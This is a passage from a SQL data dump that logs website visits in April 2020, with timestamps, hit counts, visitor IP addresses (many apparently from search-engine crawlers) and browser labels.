'),(500177,1587708274,1,1,0,0,'66.249.64.23','chrome'),(500178,1587708382,1,1,0,0,'66.249.64.25','chrome'),(500179,1587708514,1,1,0,0,'213.180.203.16','other'),(500180,1587709636,8,8,0,0,'77.120.98.235','other'),(500181,1587709696,1,1,0,0,'91.196.178.66','chrome'),(500182,1587709753,1,1,0,0,'178.154.200.222','other'),(500183,1587709885,1,1,0,0,'66.249.64.25','chrome'),(500184,1587710013,1,1,0,0,'178.154.200.220','other'),(500185,1587710061,1,1,0,0,'91.196.178.1','chrome'),(500186,1587710140,1,1,0,0,'66.249.64.24','chrome'),(500187,1587711407,2,2,0,0,'213.180.203.16','other'),(500188,1587711454,1,1,0,0,'8.29.198.26','other'),(500189,1587711740,1,1,0,0,'66.249.64.24','chrome'),(500190,1587711761,1,1,0,0,'8.29.198.27','other'),(500191,1587711843,1,1,0,0,'77.52.189.210','chrome'),(500192,1587712097,1,1,0,0,'176.37.70.97','chrome'),(500193,1587712189,1,1,0,0,'178.154.200.222','other'),(500194,1587712898,1,1,0,0,'66.249.64.23','chrome'),(500195,1587713102,2,2,0,0,'207.46.13.34','other'),(500196,1587713107,2,2,0,0,'157.55.39.206','other'),(500197,1587713217,1,1,0,0,'207.46.13.232','other'),(500198,1587713684,1,1,0,0,'66.249.70.33','chrome'),(500199,1587714254,2,1,1,0,'66.249.64.23',''),(500200,1587714407,1,1,0,0,'91.196.178.91','chrome'),(500201,1587714862,2,2,0,0,'66.249.64.24','chrome'),(500202,1587714961,1,1,0,0,'66.249.64.25','chrome'),(500203,1587715268,2,2,0,0,'178.154.200.222','other'),(500204,1587715363,2,2,0,0,'66.249.64.23','chrome'),(500205,1587715808,1,1,0,0,'157.55.39.206','other'),(500206,1587715858,1,1,0,0,'178.154.200.220','other'),(500207,1587716050,2,2,0,0,'66.249.64.24','chrome'),(500208,1587716138,1,1,0,0,'66.249.64.25','chrome'),(500209,1587716140,2,2,0,0,'213.180.203.16','other'),(500210,1587716178,1,1,0,0,'178.154.200.222','other'),(500211,1587717915,1,1,0,0,'91.196.178.81','chrome'),(500212,1587718263,3,3,0,0,'17.58.101.25','other'),(500213,1587718552,8,8,0,0,'77.120.98.235','other'),(500214,1587718647,1,1,0,0,'207.46.13.34','other'),(500215,1587718886,2,2,0,0,'178.154.200.222','other'),(500216,1587718908,1,1,0,0,'66.249.64.24','chrome'),(500217,1587719020,1,1,0,0,'157.55.39.206','other'),(500218,1587719035,1,1,0,0,'66.249.64.25','chrome'),(500219,1587719654,1,1,0,0,'66.249.70.33','chrome'),(500220,1587719850,2,2,0,0,'207.46.13.40','other'),(500221,1587719977,1,1,0,0,'66.249.64.23','chrome'),(500222,1587720022,1,1,0,0,'77.111.244.233','chrome'),(500223,1587720421,1,1,0,0,'3.210.181.82','chrome'),(500224,1587720625,1,1,0,0,'66.249.64.25','chrome'),(500225,1587720763,1,1,0,0,'91.196.178.1','chrome'),(500226,1587720771,1,1,0,0,'178.154.200.222','other'),(500227,1587721094,1,1,0,0,'207.46.13.34','other'),(500228,1587721553,1,0,1,0,'157.55.39.206',''),(500229,1587721700,1,1,0,0,'91.196.178.1','chrome'),(500230,1587721966,1,1,0,0,'178.154.200.222','other'),(500231,1587722284,2,2,0,0,'8.29.198.25','other'),(500232,1587722588,2,2,0,0,'66.249.64.24','chrome'),(500233,1587722591,1,1,0,0,'66.249.64.25','chrome'),(500234,1587722855,1,1,0,0,'66.249.64.23','chrome'),(500235,1587723341,1,1,0,0,'95.174.220.112','chrome'),(500236,1587723591,1,1,0,0,'66.249.64.24','chrome'),(500237,1587724072,1,1,0,0,'66.249.64.25','chrome'),(500238,1587724163,1,1,0,0,'178.154.200.222','other'),(500239,1587724278,2,2,0,0,'66.249.64.23','chrome'),(500240,1587725289,1,1,0,0,'66.249.64.25','chrome'),(500241,1587725613,1,1,0,0,'66.249.70.38','chrome'),(500242,1587725636,1,1,0,0,'207.46.13.40','other'),(500243,1587725652,2,2,0,0,'66.249.64.24','chrome'),(500244,1587725806,1,1,0,0,'157.55.39.206','other'),(500245,1587726624,1,1,0,0,'66.249.64.24','chrome'),(500246,1587726872,1,1,0,0,'213.180.203.16','other'),(500247,1587727255,4,4,0,0,'66.249.64.23','chrome'),(500248,1587727528,4,4,0,0,'66.249.64.24','chrome'),(500249,1587727577,2,2,0,0,'66.249.64.25','chrome'),(500250,1587727666,8,8,0,0,'77.120.98.235','other'),(500251,1587728266,1,1,0,0,'178.154.200.236','other'),(500252,1587728268,1,1,0,0,'178.154.200.220','other'),(500253,1587728359,1,1,0,0,'109.74.154.72','chrome'),(500254,1587728683,1,1,0,0,'178.154.200.222','other'),(500255,1587728796,4,4,0,0,'207.46.13.232','other'),(500256,1587729053,2,1,1,0,'207.46.13.40',''),(500257,1587729148,1,1,0,0,'66.249.64.23','chrome'),(500258,1587729217,1,1,0,0,'66.249.64.24','chrome'),(500259,1587729349,3,3,0,0,'157.55.39.206','other'),(500260,1587730248,3,3,0,0,'66.249.64.25','chrome'),(500261,1587730306,1,1,0,0,'192.36.53.165','other'),(500262,1587730307,2,2,0,0,'66.249.64.23','chrome'),(500263,1587730352,1,1,0,0,'213.180.203.16','other'),(500264,1587731141,2,2,0,0,'66.249.64.24','chrome'),(500265,1587731288,1,1,0,0,'66.249.64.25','chrome'),(500266,1587731560,1,1,0,0,'157.55.39.206','other'),(500267,1587731634,1,1,0,0,'131.220.6.152','chrome'),(500268,1587732082,2,2,0,0,'66.249.64.24','chrome'),(500269,1587732150,1,1,0,0,'207.46.13.40','other'),(500270,1587732208,1,1,0,0,'66.249.70.38','chrome'),(500271,1587732350,1,1,0,0,'178.154.200.222','other'),(500272,1587732836,1,1,0,0,'213.180.203.95','other'),(500273,1587732942,2,2,0,0,'66.249.64.25','chrome'),(500274,1587733110,2,2,0,0,'8.29.198.25','other'),(500275,1587734463,1,1,0,0,'138.246.253.15','chrome'),(500276,1587734482,5,5,0,0,'66.249.64.23','chrome'),(500277,1587734890,3,3,0,0,'66.249.64.24','chrome'),(500278,1587735593,1,1,0,0,'178.154.200.222','other'),(500279,1587735984,8,8,0,0,'77.120.98.235','other'),(500280,1587736246,1,1,0,0,'66.249.70.33','chrome'),(500281,1587736600,2,2,0,0,'157.55.39.206','other'),(500282,1587736831,1,1,0,0,'62.210.83.78','chrome'),(500283,1587737711,1,1,0,0,'66.249.70.33','chrome'),(500284,1587737714,1,1,0,0,'66.249.64.24','chrome'),(500285,1587738172,1,1,0,0,'66.249.70.36','chrome'),(500286,1587738369,1,0,1,0,'157.55.39.206',''),(500287,1587739389,1,1,0,0,'91.196.178.39','chrome'),(500288,1587739470,1,1,0,0,'31.13.127.2','other'),(500289,1587739505,1,1,0,0,'31.13.127.23','other'),(500290,1587741244,1,1,0,0,'66.249.64.25','chrome'),(500291,1587741286,1,1,0,0,'91.196.178.30','chrome'),(500292,1587741463,2,2,0,0,'207.46.13.232','other'),(500293,1587742412,1,1,0,0,'66.249.64.23','chrome'),(500294,1587742765,1,1,0,0,'66.249.64.24','chrome'),(500295,1587743129,1,1,0,0,'50.197.38.230','firefox'),(500296,1587743807,8,8,0,0,'77.120.98.235','other'),(500297,1587743936,1,1,0,0,'207.46.13.232','other'),(500298,1587743939,2,2,0,0,'8.29.198.27','other'),(500299,1587745852,1,1,0,0,'178.154.200.222','other'),(500300,1587747865,1,1,0,0,'207.46.13.252','other'),(500301,1587748261,1,1,0,0,'157.55.39.206','other'),(500302,1587749596,2,2,0,0,'66.249.64.25','chrome'),(500303,1587749881,1,1,0,0,'77.74.177.114','chrome'),(500304,1587750535,1,1,0,0,'157.55.39.206','other'),(500305,1587751010,1,1,0,0,'66.249.70.33','chrome'),(500306,1587751374,2,2,0,0,'66.249.64.24','chrome'),(500307,1587751425,1,1,0,0,'173.252.111.9','other'),(500308,1587751465,1,0,1,0,'157.55.39.206',''),(500309,1587751687,1,1,0,0,'207.46.13.252','other'),(500310,1587751912,8,8,0,0,'77.120.98.235','other'),(500311,1587751929,2,2,0,0,'66.249.64.23','chrome'),(500312,1587752564,1,1,0,0,'64.246.165.160','firefox'),(500313,1587752891,1,1,0,0,'207.46.13.68','other'),(500314,1587753050,1,1,0,0,'66.249.64.24','chrome'),(500315,1587753087,1,1,0,0,'66.249.64.23','chrome'),(500316,1587753225,1,1,0,0,'173.252.111.3','other'),(500317,1587753307,1,1,0,0,'209.17.96.122','other'),(500318,1587754053,1,1,0,0,'157.55.39.206','other'),(500319,1587754422,1,1,0,0,'66.249.64.23','chrome'),(500320,1587754767,2,2,0,0,'8.29.198.26','other'),(500321,1587755227,1,1,0,0,'66.249.64.25','chrome'),(500322,1587755684,1,1,0,0,'35.223.7.8','other'),(500323,1587755827,1,1,0,0,'64.137.181.99','chrome'),(500324,1587756045,1,1,0,0,'66.249.64.24','chrome'),(500325,1587756946,1,1,0,0,'66.249.64.23','chrome'),(500326,1587757511,1,1,0,0,'95.90.241.157','firefox'),(500327,1587758644,1,1,0,0,'66.249.64.25','chrome'),(500328,1587758703,3,3,0,0,'66.249.64.24','chrome'),(500329,1587758765,1,1,0,0,'207.46.13.252','other'),(500330,1587759456,2,2,0,0,'207.46.13.68','other'),(500331,1587759965,1,1,0,0,'66.249.70.36','chrome'),(500332,1587760036,1,1,0,0,'66.249.64.25','chrome'),(500333,1587760046,8,8,0,0,'77.120.98.235','other'),(500334,1587760161,1,1,0,0,'91.196.177.216','chrome'),(500335,1587760313,2,2,0,0,'66.249.64.24','chrome'),(500336,1587760658,1,1,0,0,'207.46.13.68','other'),(500337,1587760725,4,4,0,0,'66.249.64.23','chrome'),(500338,1587761295,4,4,0,0,'66.249.64.24','chrome'),(500339,1587761418,1,1,0,0,'207.46.13.252','other'),(500340,1587763075,2,2,0,0,'66.249.64.23','chrome'),(500341,1587763104,1,1,0,0,'178.154.200.222','other'),(500342,1587763259,1,1,0,0,'66.249.64.24','chrome'),(500343,1587763700,1,1,0,0,'66.249.70.33','chrome'),(500344,1587763909,2,1,1,0,'207.46.13.68',''),(500345,1587764036,1,1,0,0,'178.154.200.222','other'),(500346,1587764122,2,2,0,0,'66.249.64.23','chrome'),(500347,1587765402,1,1,0,0,'157.55.39.206','other'),(500348,1587765427,1,1,0,0,'213.180.203.16','other'),(500349,1587765598,1,1,0,0,'8.29.198.26','other'),(500350,1587765629,2,2,0,0,'66.249.64.24','chrome'),(500351,1587765841,1,1,0,0,'66.249.64.23','chrome'),(500352,1587765916,1,1,0,0,'8.29.198.25','other'),(500353,1587766024,1,1,0,0,'207.46.13.252','other'),(500354,1587766715,1,1,0,0,'66.249.64.25','chrome'),(500355,1587766852,1,1,0,0,'66.249.70.38','chrome'),(500356,1587767504,2,2,0,0,'207.46.13.252','other'),(500357,1587767609,1,1,0,0,'66.249.64.24','chrome'),(500358,1587768682,2,2,0,0,'207.46.13.252','other'),(500359,1587769258,1,1,0,0,'66.249.70.38','chrome'),(500360,1587769609,2,2,0,0,'66.249.64.24','chrome'),(500361,1587770095,1,1,0,0,'207.46.13.68','other'),(500362,1587770110,1,0,1,0,'66.249.64.25',''),(500363,1587770846,1,1,0,0,'213.180.203.190','other'),(500364,1587771023,2,2,0,0,'66.249.64.23','chrome'),(500365,1587771333,8,8,0,0,'77.120.98.235','other'),(500366,1587771408,1,1,0,0,'178.154.200.222','other'),(500367,1587772006,1,1,0,0,'79.173.90.153','firefox'),(500368,1587772178,1,1,0,0,'207.46.13.68','other'),(500369,1587772402,1,1,0,0,'178.154.200.112','other'),(500370,1587772505,1,1,0,0,'62.205.134.182','other'),(500371,1587772594,1,1,0,0,'66.249.64.23','chrome'),(500372,1587773380,3,3,0,0,'66.249.64.25','chrome'),(500373,1587775105,1,1,0,0,'178.154.200.222','other'),(500374,1587775156,1,1,0,0,'66.249.64.25','chrome'),(500375,1587775420,1,1,0,0,'213.180.203.16','other'),(500376,1587775582,1,1,0,0,'213.180.203.17','other'),(500377,1587775788,2,2,0,0,'66.249.64.23','chrome'),(500378,1587775838,1,1,0,0,'66.249.64.24','chrome'),(500379,1587776430,1,1,0,0,'213.180.203.122','other'),(500380,1587776433,2,2,0,0,'8.29.198.26','other'),(500381,1587776658,1,1,0,0,'213.180.203.16','other'),(500382,1587777516,1,1,0,0,'66.249.64.25','chrome'),(500383,1587777532,1,1,0,0,'178.154.200.222','other'),(500384,1587777939,1,1,0,0,'66.249.64.23','chrome'),(500385,1587778066,2,2,0,0,'66.249.64.24','chrome'),(500386,1587778432,1,1,0,0,'157.55.39.206','other'),(500387,1587778517,1,1,0,0,'44.234.25.132','other'),(500388,1587778798,1,1,0,0,'178.154.200.222','other'),(500389,1587778803,1,1,0,0,'66.249.70.38','chrome'),(500390,1587779068,1,1,0,0,'66.249.70.33','chrome'),(500391,1587779323,1,1,0,0,'66.249.64.23','chrome'),(500392,1587779643,8,8,0,0,'77.120.98.235','other'),(500393,1587779834,1,1,0,0,'66.249.64.24','chrome'),(500394,1587780067,2,2,0,0,'157.55.39.100','other'),(500395,1587780315,1,1,0,0,'178.154.200.222','other'),(500396,1587780334,1,1,0,0,'66.249.64.23','chrome'),(500397,1587780602,1,1,0,0,'51.68.152.26','chrome'),(500398,1587780840,1,1,0,0,'213.180.203.23','other'),(500399,1587781257,1,1,0,0,'66.249.64.24','chrome'),(500400,1587781956,1,1,0,0,'157.55.39.100','other'),(500401,1587782332,1,1,0,0,'178.154.200.222','other'),(500402,1587783512,1,1,0,0,'178.154.200.222','other'),(500403,1587783627,1,1,0,0,'157.55.39.100','other'),(500404,1587784077,1,1,0,0,'66.249.70.36','chrome'),(500405,1587784501,1,1,0,0,'66.249.64.24','chrome'),(500406,1587784630,1,0,1,0,'207.46.13.252',''),(500407,1587784776,1,1,0,0,'213.180.203.16','other'),(500408,1587784959,2,2,0,0,'66.249.70.33','chrome'),(500409,1587785351,1,1,0,0,'66.249.70.38','chrome'),(500410,1587785558,1,1,0,0,'66.249.64.24','chrome'),(500411,1587786922,1,1,0,0,'66.249.70.33','chrome'),(500412,1587786932,1,1,0,0,'66.249.70.36','chrome'),(500413,1587787002,1,1,0,0,'213.180.203.16','other'),(500414,1587787204,8,8,0,0,'77.120.98.235','other'),(500415,1587787260,1,1,0,0,'8.29.198.27','other'),(500416,1587787572,1,1,0,0,'8.29.198.25','other'),(500417,1587787694,1,1,0,0,'157.55.39.100','other'),(500418,1587787696,2,2,0,0,'66.249.64.24','chrome'),(500419,1587789525,1,1,0,0,'66.249.70.33','chrome'),(500420,1587789797,1,1,0,0,'62.205.134.182','other'),(500421,1587790131,1,1,0,0,'157.55.39.74','other'),(500422,1587790211,2,2,0,0,'66.249.64.24','chrome'),(500423,1587790791,1,1,0,0,'66.249.64.23','chrome'),(500424,1587791071,1,1,0,0,'213.180.203.101','other'),(500425,1587791684,1,1,0,0,'178.154.200.236','other'),(500426,1587792440,1,1,0,0,'66.249.64.23','chrome'),(500427,1587793526,1,1,0,0,'157.55.39.100','other'),(500428,1587793543,1,1,0,0,'178.154.200.236','other'),(500429,1587794050,2,2,0,0,'66.249.64.23','chrome'),(500430,1587794296,1,1,0,0,'66.249.70.38','chrome'),(500431,1587794473,1,1,0,0,'157.55.39.206','other'),(500432,1587794480,8,8,0,0,'77.120.98.235','other'),(500433,1587795091,1,1,0,0,'66.249.70.33','chrome'),(500434,1587795376,1,1,0,0,'66.249.64.23','chrome'),(500435,1587795572,1,1,0,0,'66.249.70.38','chrome'),(500436,1587796152,1,1,0,0,'66.249.64.24','chrome'),(500437,1587796309,1,1,0,0,'178.154.200.19','other'),(500438,1587796398,1,1,0,0,'178.154.200.216','other'),(500439,1587796729,1,1,0,0,'213.180.203.90','other'),(500440,1587796896,1,1,0,0,'178.154.200.87','other'),(500441,1587796898,1,1,0,0,'178.154.200.155','other'),(500442,1587796996,2,2,0,0,'66.249.64.23','chrome'),(500443,1587797104,1,1,0,0,'54.208.102.37','other'),(500444,1587797105,1,1,0,0,'107.21.1.8','other'),(500445,1587797271,1,1,0,0,'66.249.64.24','chrome'),(500446,1587797336,1,1,0,0,'213.180.203.70','other'),(500447,1587798086,2,2,0,0,'8.29.198.26','other'),(500448,1587798109,1,1,0,0,'178.154.200.216','other'),(500449,1587799257,1,1,0,0,'213.180.203.101','other'),(500450,1587799290,1,1,0,0,'157.55.39.74','other'),(500451,1587799432,2,2,0,0,'157.55.39.206','other'),(500452,1587799817,2,2,0,0,'110.229.220.122','firefox'),(500453,1587800379,1,1,0,0,'178.154.200.67','other'),(500454,1587800724,1,1,0,0,'31.13.127.10','other'),(500455,1587801787,1,1,0,0,'66.249.64.23','chrome'),(500456,1587802019,8,8,0,0,'77.120.98.235','other'),(500457,1587802162,2,2,0,0,'66.249.64.25','chrome'),(500458,1587802306,1,1,0,0,'178.154.200.236','other'),(500459,1587803563,1,1,0,0,'31.13.127.5','other'),(500460,1587803764,1,1,0,0,'157.55.39.74','other'),(500461,1587803939,1,1,0,0,'213.180.203.90','other'),(500462,1587804355,1,1,0,0,'178.154.200.220','other'),(500463,1587805116,1,1,0,0,'66.249.70.36','chrome'),(500464,1587805763,1,1,0,0,'178.154.200.220','other'),(500465,1587806961,2,2,0,0,'66.249.64.24','chrome'),(500466,1587807207,1,1,0,0,'66.249.64.25','chrome'),(500467,1587807551,1,1,0,0,'178.154.200.67','other'),(500468,1587807562,2,2,0,0,'157.55.39.74','other'),(500469,1587808316,1,1,0,0,'66.249.64.23','chrome'),(500470,1587808913,2,2,0,0,'8.29.198.27','other'),(500471,1587809420,2,2,0,0,'157.55.39.206','other'),(500472,1587809691,1,1,0,0,'31.13.127.9','other'),(500473,1587809744,1,1,0,0,'92.38.136.69','chrome'),(500474,1587809773,1,1,0,0,'178.154.200.22','other'),(500475,1587810032,8,8,0,0,'77.120.98.235','other'),(500476,1587810178,1,1,0,0,'66.249.64.23','chrome'),(500477,1587810486,1,1,0,0,'66.249.70.38','chrome'),(500478,1587810648,1,1,0,0,'157.55.39.206','other'),(500479,1587810755,1,1,0,0,'157.55.39.74','other'),(500480,1587810938,2,2,0,0,'66.249.64.25','chrome'),(500481,1587811517,1,0,1,0,'66.249.64.23',''),(500482,1587811568,1,1,0,0,'213.180.203.29','other'),(500483,1587811880,1,1,0,0,'66.249.64.23','chrome'),(500484,1587812238,1,1,0,0,'213.180.203.17','other'),(500485,1587812578,1,1,0,0,'66.249.64.24','chrome'),(500486,1587812757,1,1,0,0,'66.249.64.25','chrome'),(500487,1587813334,1,1,0,0,'66.249.70.33','chrome'),(500488,1587813419,1,1,0,0,'213.180.203.90','other'),(500489,1587813962,1,1,0,0,'66.249.64.25','chrome'),(500490,1587813985,1,1,0,0,'91.196.178.143','chrome'),(500491,1587814443,1,1,0,0,'66.249.70.33','chrome'),(500492,1587814630,1,1,0,0,'95.85.80.27','firefox'),(500493,1587814725,1,1,0,0,'91.196.178.16','chrome'),(500494,1587814769,3,3,0,0,'157.55.39.74','other'),(500495,1587814799,2,2,0,0,'207.46.13.28','other'),(500496,1587814826,1,1,0,0,'66.249.70.38','chrome'),(500497,1587815071,1,1,0,0,'66.249.64.25','chrome'),(500498,1587815146,1,1,0,0,'109.74.154.72','chrome'),(500499,1587815878,1,1,0,0,'91.196.178.115','chrome'),(500500,1587816761,1,1,0,0,'178.154.200.222','other'),(500501,1587817127,1,1,0,0,'213.109.225.221','chrome'),(500502,1587817428,8,8,0,0,'77.120.98.235','other'),(500503,1587818283,2,2,0,0,'157.55.39.206','other'),(500504,1587818812,1,1,0,0,'66.249.64.24','chrome'),(500505,1587818923,1,1,0,0,'51.140.250.213','other'),(500506,1587819466,2,2,0,0,'157.55.39.206','other'),(500507,1587819540,1,1,0,0,'31.13.127.14','other'),(500508,1587819541,1,1,0,0,'31.13.127.1','other'),(500509,1587819564,1,1,0,0,'31.13.127.20','other'),(500510,1587819565,1,1,0,0,'31.13.127.24','other'),(500511,1587819732,2,2,0,0,'8.29.198.25','other'),(500512,1587819797,1,1,0,0,'178.154.200.222','other'),(500513,1587820080,1,1,0,0,'66.249.64.23','chrome'),(500514,1587820314,1,1,0,0,'66.249.64.25','chrome'),(500515,1587820353,1,1,0,0,'167.71.186.141','other'),(500516,1587820420,1,1,0,0,'157.55.39.74','other'),(500517,1587820447,1,1,0,0,'213.180.203.16','other'),(500518,1587821208,1,1,0,0,'66.249.64.24','chrome'),(500519,1587821993,1,1,0,0,'66.249.64.25','chrome'),(500520,1587822112,1,1,0,0,'66.249.70.36','chrome'),(500521,1587822454,1,1,0,0,'66.249.64.24','chrome'),(500522,1587822788,1,0,1,0,'66.249.64.23',''),(500523,1587822861,1,1,0,0,'157.55.39.74','other'),(500524,1587822976,1,1,0,0,'178.154.200.222','other'),(500525,1587824802,2,2,0,0,'66.249.70.38','chrome'),(500526,1587824816,1,1,0,0,'213.180.203.16','other'),(500527,1587825107,8,8,0,0,'77.120.98.235','other'),(500528,1587825120,1,1,0,0,'178.154.200.222','other'),(500529,1587825452,1,1,0,0,'207.46.13.28','other'),(500530,1587825626,1,1,0,0,'66.249.64.25','chrome'),(500531,1587826107,1,1,0,0,'66.249.64.24','chrome'),(500532,1587826455,2,2,0,0,'213.180.203.16','other'),(500533,1587826613,1,1,0,0,'66.249.64.23','chrome'),(500534,1587826659,1,1,0,0,'178.154.200.222','other'),(500535,1587826841,1,1,0,0,'178.154.200.196','other'),(500536,1587827628,1,1,0,0,'66.249.64.24','chrome'),(500537,1587828041,1,1,0,0,'66.249.70.36','chrome'),(500538,1587828522,3,3,0,0,'66.249.64.23','chrome'),(500539,1587828914,1,0,1,0,'66.249.64.25',''),(500540,1587829003,2,2,0,0,'66.249.64.25','chrome'),(500541,1587829248,1,1,0,0,'178.154.200.222','other'),(500542,1587829553,1,1,0,0,'66.249.70.36','chrome'),(500543,1587830309,1,1,0,0,'66.249.64.25','chrome'),(500544,1587830342,1,1,0,0,'213.180.203.16','other'),(500545,1587830563,1,1,0,0,'8.29.198.27','other'),(500546,1587830898,1,1,0,0,'8.29.198.25','other'),(500547,1587831447,1,1,0,0,'66.249.70.38','chrome'),(500548,1587832279,2,2,0,0,'66.249.64.25','chrome'),(500549,1587833005,1,1,0,0,'66.249.64.24','chrome'),(500550,1587833755,8,8,0,0,'77.120.98.235','other'),(500551,1587834390,1,1,0,0,'66.249.64.24','chrome'),(500552,1587834625,2,2,0,0,'66.249.70.38','chrome'),(500553,1587835265,1,1,0,0,'178.154.200.222','other'),(500554,1587835715,1,1,0,0,'66.249.70.33','chrome'),(500555,1587835917,1,1,0,0,'207.46.13.28','other'),(500556,1587836808,1,1,0,0,'213.180.203.16','other'),(500557,1587837018,1,1,0,0,'66.249.64.24','chrome'),(500558,1587837879,3,3,0,0,'213.180.203.16','other'),(500559,1587837897,2,1,1,0,'157.55.39.206',''),(500560,1587838230,1,1,0,0,'178.154.200.222','other'),(500561,1587838534,1,1,0,0,'178.154.200.22','other'),(500562,1587839379,1,1,0,0,'207.46.13.64','other'),(500563,1587839843,2,2,0,0,'213.180.203.16','other'),(500564,1587840125,1,1,0,0,'157.55.39.206','other'),(500565,1587840414,1,1,0,0,'178.154.200.222','other'),(500566,1587840486,1,1,0,0,'207.46.13.64','other'),(500567,1587840810,3,3,0,0,'66.249.64.24','chrome'),(500568,1587840985,1,1,0,0,'213.180.203.16','other'),(500569,1587841399,1,1,0,0,'8.29.198.26','other'),(500570,1587841470,8,8,0,0,'77.120.98.235','other'),(500571,1587841732,1,1,0,0,'8.29.198.25','other'),(500572,1587841895,1,1,0,0,'66.249.70.33','chrome'),(500573,1587842176,1,1,0,0,'66.249.64.24','chrome'),(500574,1587842250,1,1,0,0,'193.30.242.250','chrome'),(500575,1587842282,1,1,0,0,'66.249.64.25','chrome'),(500576,1587843262,1,1,0,0,'207.46.13.28','other'),(500577,1587843307,1,1,0,0,'213.180.203.16','other'),(500578,1587843380,1,1,0,0,'52.12.5.22','chrome'),(500579,1587843421,2,2,0,0,'66.249.64.25','chrome'),(500580,1587843626,1,1,0,0,'176.37.53.88','firefox'),(500581,1587843749,1,1,0,0,'91.196.178.162','chrome'),(500582,1587843894,2,2,0,0,'66.249.64.24','chrome'),(500583,1587844239,1,1,0,0,'173.252.111.15','other'),(500584,1587844241,1,1,0,0,'173.252.111.19','other'),(500585,1587844244,1,1,0,0,'173.252.111.5','other'),(500586,1587844365,1,1,0,0,'213.180.203.16','other'),(500587,1587844603,1,1,0,0,'157.55.39.206','other'),(500588,1587844725,2,2,0,0,'178.154.200.222','other'),(500589,1587845262,1,1,0,0,'66.249.64.24','chrome'),(500590,1587845836,1,1,0,0,'178.154.200.222','other'),(500591,1587846948,1,1,0,0,'66.249.70.36','chrome'),(500592,1587847154,1,1,0,0,'66.249.64.23','chrome'),(500593,1587847755,2,2,0,0,'178.154.200.222','other'),(500594,1587848038,1,1,0,0,'66.249.64.25','chrome'),(500595,1587848142,1,1,0,0,'138.197.153.228','firefox'),(500596,1587848480,1,0,1,0,'66.249.64.23',''),(500597,1587848502,1,0,1,0,'157.55.39.206',''),(500598,1587848955,8,8,0,0,'77.120.98.235','other'),(500599,1587849386,1,1,0,0,'207.46.13.64','other'),(500600,1587849542,1,1,0,0,'213.180.203.16','other'),(500601,1587849638,1,1,0,0,'66.249.64.25','chrome'),(500602,1587850150,1,1,0,0,'157.55.39.206','other'),(500603,1587852226,1,1,0,0,'8.29.198.26','other'),(500604,1587852299,1,0,1,0,'66.249.64.25',''),(500605,1587852567,1,1,0,0,'8.29.198.25','other'),(500606,1587853083,1,1,0,0,'207.46.13.64','other'),(500607,1587853400,1,1,0,0,'178.154.200.92','other'),(500608,1587853401,1,1,0,0,'213.180.203.17','other'),(500609,1587854166,1,1,0,0,'66.249.64.25','chrome'),(500610,1587854249,1,0,1,0,'157.55.39.206',''),(500611,1587855515,1,1,0,0,'178.154.200.222','other'),(500612,1587857159,8,8,0,0,'77.120.98.235','other'),(500613,1587857178,1,1,0,0,'66.249.64.25','chrome'),(500614,1587858077,1,1,0,0,'52.15.111.35','chrome'),(500615,1587858828,1,1,0,0,'66.249.64.23','chrome'),(500616,1587858906,1,1,0,0,'62.205.134.182','other'),(500617,1587859014,2,2,0,0,'66.249.64.25','chrome'),(500618,1587860272,1,0,1,0,'157.55.39.193',''),(500619,1587861076,4,4,0,0,'66.249.64.25','chrome'),(500620,1587861273,1,1,0,0,'66.249.70.33','chrome'),(500621,1587861451,1,1,0,0,'78.27.153.15','chrome'),(500622,1587861479,1,1,0,0,'66.249.64.23','chrome'),(500623,1587861498,1,0,1,0,'207.46.13.64',''),(500624,1587862470,1,1,0,0,'66.249.70.36','chrome'),(500625,1587862984,1,1,0,0,'66.249.64.25','chrome'),(500626,1587863000,1,1,0,0,'66.249.64.24','chrome'),(500627,1587863054,1,1,0,0,'8.29.198.27','other'),(500628,1587863396,1,1,0,0,'8.29.198.25','other'),(500629,1587865175,8,8,0,0,'77.120.98.235','other'),(500630,1587865268,1,1,0,0,'66.249.70.33','chrome'),(500631,1587865534,1,1,0,0,'207.46.13.64','other'),(500632,1587866231,1,1,0,0,'66.249.70.33','chrome'),(500633,1587866854,1,0,1,0,'157.55.39.206',''),(500634,1587867057,1,1,0,0,'66.249.64.24','chrome'),(500635,1587868396,1,0,1,0,'157.55.39.206',''),(500636,1587868977,1,1,0,0,'66.249.64.23','chrome'),(500637,1587868986,1,1,0,0,'207.46.13.64','other'),(500638,1587869925,1,1,0,0,'207.46.13.64','other'),(500639,1587871252,1,1,0,0,'66.249.64.23','chrome'),(500640,1587871964,2,2,0,0,'34.67.181.1','chrome'),(500641,1587872059,3,3,0,0,'34.67.7.147','chrome'),(500642,1587872070,2,2,0,0,'34.68.38.164','chrome'),(500644,1587872082,3,3,0,0,'35.222.185.233','chrome'),(500645,1587872092,1,1,0,0,'35.239.78.244','chrome'),(500646,1587872093,2,2,0,0,'35.239.78.244','chrome'),(500647,1587872102,2,2,0,0,'104.197.3.187','chrome'),(500649,1587872229,1,1,0,0,'66.249.64.23','chrome'),(500650,1587873238,8,8,0,0,'77.120.98.235','other'),(500651,1587873310,1,0,1,0,'66.249.64.25',''),(500652,1587873881,1,1,0,0,'8.29.198.27','other'),(500653,1587873918,2,2,0,0,'66.249.64.25','chrome'),(500654,1587874227,1,1,0,0,'8.29.198.25','other'),(500655,1587874732,1,1,0,0,'62.171.169.50','other'),(500656,1587875138,1,0,1,0,'157.55.39.206',''),(500657,1587875701,1,1,0,0,'154.51.131.142','chrome'),(500658,1587876109,1,1,0,0,'207.46.13.64','other'),(500659,1587876264,1,1,0,0,'62.205.134.182','other'),(500660,1587876978,1,1,0,0,'2.47.39.221','other'),(500661,1587877834,1,1,0,0,'66.249.64.25','chrome'),(500662,1587878452,1,1,0,0,'91.196.178.16','chrome'),(500663,1587878504,1,1,0,0,'66.249.70.36','chrome'),(500664,1587879428,1,1,0,0,'66.249.64.23','chrome'),(500665,1587879848,1,1,0,0,'66.249.64.25','chrome'),(500666,1587880005,1,1,0,0,'207.46.13.180','other'),(500667,1587880204,1,1,0,0,'91.196.178.16','chrome'),(500668,1587880346,1,1,0,0,'31.13.103.12','other'),(500669,1587880347,1,1,0,0,'31.13.103.13','other'),(500670,1587880948,2,2,0,0,'66.249.64.25','chrome'),(500671,1587881521,8,8,0,0,'77.120.98.235','other'),(500672,1587881610,2,2,0,0,'66.249.64.24','chrome'),(500673,1587881677,1,0,1,0,'66.249.64.23',''),(500674,1587881707,2,2,0,0,'66.249.64.23','chrome'),(500675,1587882813,1,1,0,0,'66.249.64.24','chrome'),(500676,1587883780,1,1,0,0,'207.46.13.64','other'),(500677,1587884316,1,1,0,0,'66.249.64.25','chrome'),(500678,1587884708,2,2,0,0,'8.29.198.26','other'),(500679,1587885439,1,1,0,0,'66.249.70.36','chrome'),(500680,1587885448,1,1